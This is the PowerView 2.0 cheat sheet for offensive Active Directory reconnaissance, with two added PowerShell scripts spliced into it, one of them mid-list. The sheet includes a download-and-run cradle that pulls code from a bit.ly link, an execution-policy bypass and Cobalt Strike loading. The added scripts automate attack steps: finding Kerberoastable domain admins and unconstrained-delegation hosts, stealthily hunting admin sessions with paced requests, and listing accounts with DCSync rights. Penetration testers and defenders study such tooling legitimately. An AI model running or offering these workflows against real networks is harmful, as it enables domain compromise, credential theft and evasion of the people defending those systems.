PowerView 2.0 Cheat Sheet
Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.

Getting Started

  Get PowerView:                   http://bit.ly/1pzQCnv
  Load from disk:                  1) C:\> powershell -exec bypass
                                   2) PS C:\> Import-Module powerview.ps1
  Load from GitHub:                PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1pzQCnv")
  Run on a non-domain-joined       1) configure DNS to point to a DC of the domain
  machine:                         2) runas /netonly /user:DOMAIN\user powershell.exe
  Load in Cobalt Strike's Beacon:  beacon> powershell-import /local/path/to/powerview.ps1
                                   then beacon> powershell CMDLET-NAME
  Getting help:                    PS C:\> Get-Help Cmdlet-Name [-detailed] [-full]

  Most PowerView functions are implemented in Empire under situational_awareness/network/powerview/*.

Filtering and Output

  Execute a command on each result object   … | %{ … Invoke-Command $_ }
  Filter result objects by field            … | ? {$_.Field -eq X}
  Only return certain properties            … | Select prop1,prop2
  Display output as a list                  … | fl
  Display output as a wrapped table         … | ft -wrap
  Write out to a file                       … | Out-File -Encoding Ascii out.txt
  Write to .csv                             … | Export-CSV -NoTypeInformation out.csv
  Write to an .xml object                   … | Export-Clixml obj.xml
  Read an .xml object                       $obj = Import-Clixml obj.xml

Common Cmdlet Options

  -Verbose                          Display verbose status/debug information
  -Delay 10                         Add a 10 second delay between enumerating each machine
  -Threads 15                       Execute a "meta" function with 15 threads
  -Domain foreign.com               Pull information from a foreign domain. Otherwise functions
                                    default to the current domain.
  -DomainController dc.domain.com   Reflect LDAP queries through a specific DC
  -ComputerName SERVER.domain.com   Execute a command/search on/for a specified computer

  Many "search" cmdlets (e.g. Invoke-UserHunter) also have additional common options:

  -NoPing                                   Don't ping machines before enumerating them
  -ComputerFile file.txt                    File of computer names to enumerate
  -ComputerFilter "(description=*web*)"     Enumerate computers found with a specific LDAP filter
  -ComputerADSpath "LDAP://OU=secret,..."   Enumerate computers on a specific ADS path (e.g. in specific OUs)
  -UserFile users.txt                       File of user names to search for
  -UserFilter "(description=*web*)"         Search for users with a specific LDAP filter
  -UserADSpath "LDAP://OU=secret, ..."      Only search for users on a specific ADS path

Computer Enumeration

  Get-NetComputer will enumerate computer objects on a given domain through LDAP,
  returning hostnames by default.

  -Ping                              Return only live hosts
  -FullData                          Full computer objects (not just hostnames)
  -Filter "(description=*web*)"      Search with a specific LDAP filter
  -ADSpath "LDAP://OU=secret, ..."   Search a specific domain ADS path (e.g. OUs)
  -Unconstrained                     Machines with unconstrained delegation

Identifying Your Prey

  Get-NetGroup will enumerate the group objects themselves on a given domain through LDAP.

  -GroupName *admin*   Return specific name results
  -FullData            Full group objects
  -UserName USER       (Nested) groups a specific user is a member of

  Get-NetGroupMember will enumerate the members of a specific group on a given domain through LDAP.

  -GroupName "Domain Admins"   Specified group name
  -FullData                    Full user objects
  -Recurse                     Recursively resolve the members of any results that are groups

  Get-NetUser will enumerate user objects on a given domain through LDAP.

  -UserName "*john*"                 Return specific name results
  -Filter "(field=*term*)"           Search with a specific LDAP filter
  -AdminCount                        Return users who are (or were) a member of an admin-protected group
  -SPN                               Users with a service principal name set (likely service accounts)
  -ADSpath "LDAP://OU=secret, ..."   Search a specific domain ADS path
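The enumeration cmdlets and the output options above are usually chained rather than run one at a time. The script below is an added example, not part of the cheat sheet or of PowerView itself: it resolves Domain Admins through nested groups, pulls every SPN-bearing user as a full object, intersects the two to find privileged accounts that can be Kerberoasted, grabs live hosts with unconstrained delegation, and writes the results out in the three formats the sheet lists. Only cmdlets and switches named on the sheet are used; the assumptions are the property names on the returned objects (MemberName from Get-NetGroupMember; samaccountname, serviceprincipalname and pwdlastset on -FullData user objects) and that PowerView may already have converted pwdlastset to a DateTime.

```powershell
# Added example (not from the PowerView cheat sheet). Assumes powerview.ps1 is
# imported and the session has line of sight to the domain (runas /netonly is fine).
# ASSUMPTIONS: MemberName on Get-NetGroupMember results; samaccountname,
# serviceprincipalname and pwdlastset on Get-NetUser -FullData objects.
param(
    [string]$Domain,             # optional, same as the sheet's -Domain foreign.com
    [string]$DomainController,   # optional, pin all LDAP to one DC
    [string]$OutDir = '.\pv-out'
)

# Splat so every call targets the same domain / DC.
$ctx = @{}
if ($Domain)           { $ctx['Domain'] = $Domain }
if ($DomainController) { $ctx['DomainController'] = $DomainController }
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# 1. Privileged users: Domain Admins flattened through nested groups.
$admins     = Get-NetGroupMember -GroupName 'Domain Admins' -Recurse @ctx
$adminNames = $admins | ForEach-Object { ([string]$_.MemberName).ToLower() } |
              Sort-Object -Unique

# 2. Service-account-like users as full objects, so SPNs and pwdlastset are readable.
$spnUsers = Get-NetUser -SPN -FullData @ctx

# 3. Intersect: admins that also carry an SPN (roastable), with password age.
$now = Get-Date
$roastableAdmins = foreach ($u in $spnUsers) {
    $sam = [string]$u.samaccountname
    if ($adminNames -contains $sam.ToLower()) {
        # pwdlastset is a FILETIME in LDAP; PowerView may already return a DateTime
        # (assumption), so handle both.
        $pls = $u.pwdlastset
        if ($pls -isnot [datetime]) { $pls = [datetime]::FromFileTime([int64]$pls) }
        [pscustomobject]@{
            SamAccountName = $sam
            SPNs           = (@($u.serviceprincipalname) -join ';')
            PwdAgeDays     = [int]($now - $pls).TotalDays
        }
    }
}

# 4. Hosts with unconstrained delegation, restricted to those answering a ping.
$unconstrained = Get-NetComputer -Unconstrained -Ping @ctx

# 5. Persist: CSV for reporting, CliXML so the objects reload with Import-Clixml,
#    plain ASCII for grep / other tooling.
$roastableAdmins | Sort-Object PwdAgeDays -Descending |
    Export-Csv -NoTypeInformation (Join-Path $OutDir 'roastable-admins.csv')
$admins        | Export-Clixml (Join-Path $OutDir 'domain-admins.xml')
$unconstrained | Out-File -Encoding Ascii (Join-Path $OutDir 'unconstrained.txt')

$roastableAdmins | Format-Table -Wrap
```

Run it as `.\Enum-Targets.ps1 -DomainController dc.domain.com` after importing PowerView; the -DomainController pin matters in a hunt because it keeps the LDAP footprint on one DC instead of scattering queries across whichever DC DNS hands back.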
  Find-UserField will search a specified user field/property for a given term for all
  user objects through LDAP.

  -SearchField description   Specify the field to search
  -SearchTerm term           Term to search for

User-Hunting

  Invoke-UserHunter will use LDAP queries and API calls to locate users on the domain.
  Note: default behavior searches for "Domain Admins" and touches every machine on the domain!

  -GroupName "Web Admins"           Hunt for members of a specific group
  -ShowAll                          Show all results (i.e. don't filter by user targets)
  -Stealth                          Hunt using only session information from file servers/DCs
  -TargetServer SERVER.domain.com   Hunt for users who are effective local admins for a given server
  -StopOnSuccess                    Stop on the first successful result found

Domain [Trusts]

  Get-NetDomain                              Info on the current domain
  Get-NetDomainController                    Domain controllers for the current domain
  Get-NetForest                              Info on the current forest
  Get-NetForestDomain                        Enumerate all domains in the current forest
  Get-NetForestTrust                         Get all forest trusts for the current forest
  Get-NetDomainTrust                         Get all domain trusts (à la nltest /trusted_domains)
  Invoke-MapDomainTrust                      Recursively map all domain trusts
  Find-ForeignUser                           Find users in groups outside of the given domain (outgoing access)
  Find-ForeignGroup -Domain target.domain.com
                                             Find groups with users outside of the given domain (incoming access)
  Invoke-EnumerateLocalAdmin -TrustGroup     Enumerate local administrators in groups not in the given domain

Data Mining

  Invoke-ShareFinder will use LDAP queries and API calls to search for open shares on the domain.
  Note: default behavior touches every machine on the domain!

  -CheckShareAccess   Only return shares the current user can read

  Find-InterestingFile will recursively search a given local/UNC path for files matching
  specific criteria.

  -Path \\SERVER\Share                        Search a specific UNC path
  -Terms term1,term2,term3                    Only return files with the specified search terms in their names
  -OfficeDocs                                 Only return office docs
  -LastAccessTime (Get-Date).AddDays(-7)      Only return files accessed within the last week

Local Admin Enumeration

  Get-NetLocalGroup will enumerate the local users/groups from localhost or a remote machine.

  -ComputerName X                       Enumerate local admins from hostname (or IP)
  -ListGroups                           List the local groups instead of group members
  -GroupName "Remote Desktop Users"     Use an alternate group besides local admins
  -Recurse                              Resolve any results that are groups, giving a set of effective users

Misc. Functions

  Get-NetOU                 Search domain OUs
  Get-NetFileServer         Get all likely fileservers
  Get-NetShare              Get shares for a specific machine X.domain.com
  Get-NetSession            Get sessions for a specific machine X.domain.com
  Get-NetLoggedOn           Get logged-on users for a specific machine X.domain.com
  Get-NetRDPSession         Get RDP sessions (and source IPs) for X.domain.com
  Get-ExploitableSystem     Get (possibly) exploitable systems

Power-One-Liners

  Take a GPP GUID and get all computers the local admin password is applied to:
    Get-NetOU -GUID {GPP_GUID} | %{ Get-NetComputer -ADSPath $_ }

  Find machines the current user has local admin access on:
    Find-LocalAdminAccess

  Get the default domain access policy:
    Get-DomainPolicy | Select -Expand SystemAccess

  See who can admin all domain controllers in the current domain:
    Get-NetDomainController | Get-NetLocalGroup

  See what objects have DCSync rights:
    Get-ObjectACL -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }

  Users with sidHistory set:
    Get-NetUser -Filter '(sidHistory=*)'

  Users with passwords older than 1 year:
    $Date = (Get-Date).AddYears(-1).ToFileTime(); Get-NetUser -Filter "(pwdlastset<=$Date)"

  Search SYSVOL for common scripts:
    Invoke-FileFinder -SearchSYSVol

More Information

  http://www.harmj0y.net/blog/tag/powerview/
  http://www.verisgroup.com/adaptive-threat-division/
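The User-Hunting, Local Admin Enumeration and Power-One-Liners sections fit together as one low-noise workflow: learn who administers the DCs, hunt for that group using only file-server and DC session data, and check which principals hold DCSync-capable ACEs on the domain head. The script below is an added example, not part of the cheat sheet or of PowerView: it uses the sheet's own cmdlets and switches, and wraps the sheet's DCSync ACL filter in a function that groups the matching ACEs per principal, which matters because a DCSync needs both replication extended rights (or GenericAll) on the same identity. The assumptions are the property names on Get-ObjectACL results (IdentityReference, ObjectType, ActiveDirectoryRights) and the placeholder domain DN.

```powershell
# Added example (not from the PowerView cheat sheet). Assumes powerview.ps1 is
# imported and DNS or -DomainController points at the target domain.
# ASSUMPTIONS: IdentityReference / ObjectType / ActiveDirectoryRights on the
# objects Get-ObjectACL returns; the domain DN below is a placeholder.
param(
    [string]$TargetGroup = 'Domain Admins',
    [string]$DomainDN    = 'dc=domain,dc=local',   # placeholder, replace with the real DN
    [int]$Delay          = 2,                      # seconds between hosts, keeps the hunt quiet
    [string]$OutDir      = '.\hunt-out'
)
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# 1. Effective local admins on every DC. -Recurse flattens nested domain groups
#    into users (the sheet's Get-NetDomainController | Get-NetLocalGroup one-liner).
$dcAdmins = Get-NetDomainController | Get-NetLocalGroup -Recurse
$dcAdmins | Export-Csv -NoTypeInformation (Join-Path $OutDir 'dc-local-admins.csv')

# 2. Stealth hunt for the target group: -Stealth reads sessions only from file
#    servers and DCs, -NoPing skips the ICMP sweep, -Delay paces the requests.
#    Without -ShowAll, only hits for members of $TargetGroup come back.
$hunt = Invoke-UserHunter -GroupName $TargetGroup -Stealth -NoPing -Delay $Delay
$hunt | Export-Clixml (Join-Path $OutDir 'stealth-hunt.xml')   # reload with Import-Clixml

# 3. DCSync rights. The sheet's filter, made reusable and grouped per principal:
#    'replication-get' matches both DS-Replication-Get-Changes and
#    DS-Replication-Get-Changes-All (PowerShell -match is case-insensitive),
#    and GenericAll implies them. A principal needs both extended rights, or
#    GenericAll, to DCSync, so the grouped Rights column shows who is complete.
function Get-DCSyncPrincipal {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    Get-ObjectACL -DistinguishedName $DistinguishedName -ResolveGUIDs |
        Where-Object { ($_.ObjectType -match 'replication-get') -or
                       ($_.ActiveDirectoryRights -match 'GenericAll') } |
        Group-Object IdentityReference |
        ForEach-Object {
            [pscustomobject]@{
                Principal = $_.Name
                Rights    = (($_.Group | ForEach-Object {
                                 "$($_.ActiveDirectoryRights):$($_.ObjectType)"
                             } | Sort-Object -Unique) -join ';')
            }
        }
}
$dcsync = Get-DCSyncPrincipal -DistinguishedName $DomainDN
$dcsync | Export-Csv -NoTypeInformation (Join-Path $OutDir 'dcsync-principals.csv')

# 4. Accounts the sheet flags as worth a second look: sidHistory set, stale passwords.
$oneYear   = (Get-Date).AddYears(-1).ToFileTime()
$sidHist   = Get-NetUser -Filter '(sidHistory=*)'
$stalePwds = Get-NetUser -Filter "(pwdlastset<=$oneYear)"
$sidHist   | Out-File -Encoding Ascii (Join-Path $OutDir 'sidhistory-users.txt')
$stalePwds | Out-File -Encoding Ascii (Join-Path $OutDir 'stale-password-users.txt')

"DC local admin entries : $(@($dcAdmins).Count)"
"Stealth hunt hits      : $(@($hunt).Count)"
"DCSync principals      : $(@($dcsync).Count)"
$dcsync | Format-Table -Wrap
```

Expect the DCSync list to contain the DC computer accounts, Domain Controllers, Enterprise Domain Controllers and the domain's Administrators group by default; anything else in the Principal column is either a deliberate delegation (Azure AD Connect / MSOL accounts are the usual legitimate case) or a finding.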